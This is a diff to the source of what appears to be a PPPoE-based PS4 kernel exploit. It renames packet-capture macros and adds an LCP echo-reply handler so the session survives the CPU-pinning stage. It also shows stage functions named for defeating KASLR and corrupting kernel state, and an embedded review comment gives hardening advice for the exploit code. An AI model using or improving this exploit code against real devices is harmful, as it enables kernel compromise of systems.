diff --git a/src/exploit.cpp b/src/exploit.cpp
index c4ba2ec..bff2bcc 100644
--- a/src/exploit.cpp
+++ b/src/exploit.cpp
@@ -65,8 +65,8 @@ struct Cookie {
 #define CHECK_RET(value) if((value) != 0) return 1
-#define startCapture(cb) if(dev->startCaptureBlockingMode(cb, nullptr, this->timeout) != 1) { return 1; }
-#define startCaptureWithCookie(cb, cookie) if(dev->startCaptureBlockingMode(cb, cookie, this->timeout) != 1) { return 1; }
+#define startBlockingCapture(cb) if(dev->startCaptureBlockingMode(cb, nullptr, this->timeout) != 1) { return 1; }
+#define startBlockingCaptureWithCookie(cb, cookie) if(dev->startCaptureBlockingMode(cb, cookie, this->timeout) != 1) { return 1; }
 LcpEchoHandler::LcpEchoHandler(const std::string &iface) {
 dev = pcpp::PcapLiveDeviceList::getInstance().getPcapLiveDeviceByName(iface);
@@ -243,7 +243,7 @@ int Exploit::lcp_negotiation() const {
 std::cout << "[*] Waiting for LCP configure ACK..." << std::endl;
 {
- startCapture(
+ startBlockingCapture(
 [](pcpp::RawPacket *packet, pcpp::PcapLiveDevice *device, void *cookie) -> bool {
 pcpp::Packet parsedPacket(packet);
 auto *layer = PacketBuilder::getPPPoESessionLayer(parsedPacket, PCPP_PPP_LCP);
@@ -255,7 +255,7 @@ int Exploit::lcp_negotiation() const {
 std::cout << "[*] Waiting for LCP configure request..." << std::endl;
 uint8_t lcp_id = 0;
 {
- startCaptureWithCookie(
+ startBlockingCaptureWithCookie(
 [](pcpp::RawPacket *packet, pcpp::PcapLiveDevice *device, void *cookie) -> bool {
 pcpp::Packet parsedPacket(packet);
 auto *layer = PacketBuilder::getPPPoESessionLayer(parsedPacket, PCPP_PPP_LCP);
@@ -284,7 +284,7 @@ int Exploit::ipcp_negotiation() const {
 std::cout << "[*] Waiting for IPCP configure ACK..." << std::endl;
 {
- startCapture(
+ startBlockingCapture(
 [](pcpp::RawPacket *packet, pcpp::PcapLiveDevice *device, void *cookie) -> bool {
 pcpp::Packet parsedPacket(packet);
 auto *layer = PacketBuilder::getPPPoESessionLayer(parsedPacket, PCPP_PPP_IPCP);
@@ -296,7 +296,7 @@ int Exploit::ipcp_negotiation() const {
 std::cout << "[*] Waiting for IPCP configure request..." << std::endl;
 uint8_t ipcp_id = 0;
 {
- startCaptureWithCookie(
+ startBlockingCaptureWithCookie(
 [](pcpp::RawPacket *packet, pcpp::PcapLiveDevice *device, void *cookie) -> bool {
 pcpp::Packet parsedPacket(packet);
 auto *lcp_id = (uint8_t *) cookie;
@@ -318,7 +318,7 @@ int Exploit::ipcp_negotiation() const {
 std::cout << "[*] Waiting for IPCP configure request..." << std::endl;
 Cookie pkt;
 {
- startCaptureWithCookie(
+ startBlockingCaptureWithCookie(
 [](pcpp::RawPacket *packet, pcpp::PcapLiveDevice *device, void *cookie) -> bool {
 pcpp::Packet parsedPacket(packet, pcpp::PPPoESession);
 auto *layer = PacketBuilder::getPPPoESessionLayer(parsedPacket, PCPP_PPP_IPCP);
@@ -415,7 +415,7 @@ int Exploit::ppp_negotiation(const std::function(Exploit *)
 std::cout << "[*] Waiting for PADR..." << std::endl;
 {
- startCapture(
+ startBlockingCapture(
 [](pcpp::RawPacket *packet, pcpp::PcapLiveDevice *device, void *cookie) -> bool {
 pcpp::Packet parsedPacket(packet);
 auto *layer = PacketBuilder::getPPPoEDiscoveryLayer(parsedPacket,
@@ -753,7 +753,7 @@ int Exploit::stage0() {
 dev->sendPacket(&packet);
 }
- startCapture(
+ startBlockingCapture(
 [](pcpp::RawPacket *packet, pcpp::PcapLiveDevice *device, void *cookie) -> bool {
 pcpp::Packet parsedPacket(packet, pcpp::ICMPv6);
 if (!parsedPacket.isPacketOfType(pcpp::ICMPv6)) return false;
@@ -778,6 +778,25 @@ int Exploit::stage0() {
 }
 int Exploit::stage1() {
+ /**
+ * In some devices, the waiting time is not accurate, which may cause the CPU pinning time to be too long,
+ * and the PS4 unilaterally ends the PPPoE session.
+ * To avoid this situation, respond to the PPPoE ECHO_REQ here
+ */
+ dev->startCapture([](pcpp::RawPacket* packet, pcpp::PcapLiveDevice* device, void* cookie){
+ pcpp::Packet parsedPacket(packet, pcpp::PPPoESession);
+ auto *pppLayer = PacketBuilder::getPPPoESessionLayer(parsedPacket, PCPP_PPP_LCP);
+ if (!pppLayer) return;
+ if (pppLayer->getLayerPayload()[0] != ECHO_REQ) return;
+ auto *etherLayer = parsedPacket.getLayerOfType();
+ if (!etherLayer) return;
+ auto &&echoReply = PacketBuilder::lcpEchoReply(etherLayer->getDestMac(), etherLayer->getSourceMac(),
+ pppLayer->getPPPoEHeader()->sessionId,
+ pppLayer->getLayerPayload()[1], // id
+ *(uint32_t *) &pppLayer->getLayerPayload()[4]); // magic number
+ device->sendPacket(&echoReply);
+ }, nullptr);
+
 /**
 * Send invalid packet to trigger a printf in the kernel. For some
 * reason, this causes scheduling on CPU 0 at some point, which makes
@@ -795,6 +814,7 @@ int Exploit::stage1() {
 }
 }
+ dev->stopCapture();
 std::cout << "\r[+] Pinning to CPU 0...done" << std::endl;
 // LCP fails sometimes without the wait
@@ -812,7 +832,7 @@ int Exploit::stage1() {
 }
 std::cout << "[*] Waiting for LCP configure reject..." << std::endl;
- startCapture(
+ startBlockingCapture(
 [](pcpp::RawPacket *packet, pcpp::PcapLiveDevice *device, void *cookie) -> bool {
 pcpp::Packet parsedPacket(packet);
 auto *layer = PacketBuilder::getPPPoESessionLayer(parsedPacket, PCPP_PPP_LCP);
@@ -847,7 +867,7 @@ int Exploit::stage1() {
 dev->sendPacket(&packet);
 }
- startCaptureWithCookie(
+ startBlockingCaptureWithCookie(
 [](pcpp::RawPacket *packet, pcpp::PcapLiveDevice *device, void *cookie) -> bool {
 pcpp::Packet parsedPacket(packet);
 auto *corrupted = (bool *) cookie;
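Review bot: The echo-reply callback added in stage1 indexes `pppLayer->getLayerPayload()` at `[1]` and reads four bytes at `[4]` without checking `getLayerPayloadSize()`, so an LCP payload shorter than 8 bytes is read past its end; add `if (pppLayer->getLayerPayloadSize() < 8) return;` right after the ECHO_REQ test and fetch the magic number with `memcpy` instead of the `*(uint32_t *)` cast, which is also an unaligned read. The result of `dev->startCapture(` is discarded, whereas every blocking capture in this file bails out with `return 1` when the capture cannot start; `if (!dev->startCapture(..., nullptr)) return 1;` keeps the two paths consistent. The callback also calls `device->sendPacket` from the capture thread while, going by the comment that follows in the hunk, the main thread keeps sending on the same `dev` during the pinning loop; libpcap does not promise that one handle is safe to use from two threads, so either serialize the sends with a mutex or confirm the loop does not send in that window. The matching `dev->stopCapture()` in the -795 hunk runs only on the fall-through path, and old lines 784–794 of stage1 are not in this diff, so any early return there would leave the background capture running into the later `startBlockingCapture`. stage1 begins in this hunk and continues past the -795 hunk.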
@@ -888,7 +908,7 @@ int Exploit::stage1() {
 int Exploit::stage2() {
 std::cout << std::endl << "[*] Defeating KASLR..." << std::endl;
- startCaptureWithCookie(
+ startBlockingCaptureWithCookie(
 [](pcpp::RawPacket *packet, pcpp::PcapLiveDevice *device, void *cookie) -> bool {
 pcpp::Packet parsedPacket(packet, pcpp::ICMPv6);
 if (!parsedPacket.isPacketOfType(pcpp::ICMPv6)) return false;
@@ -940,7 +960,7 @@ int Exploit::stage3() {
 std::cout << "[*] Waiting for stage1 to resume..." << std::endl;
 int count = 0;
- startCaptureWithCookie(
+ startBlockingCaptureWithCookie(
 [](pcpp::RawPacket *packet, pcpp::PcapLiveDevice *device, void *cookie) -> bool {
 auto *count = (int *) cookie;
 pcpp::Packet parsedPacket(packet);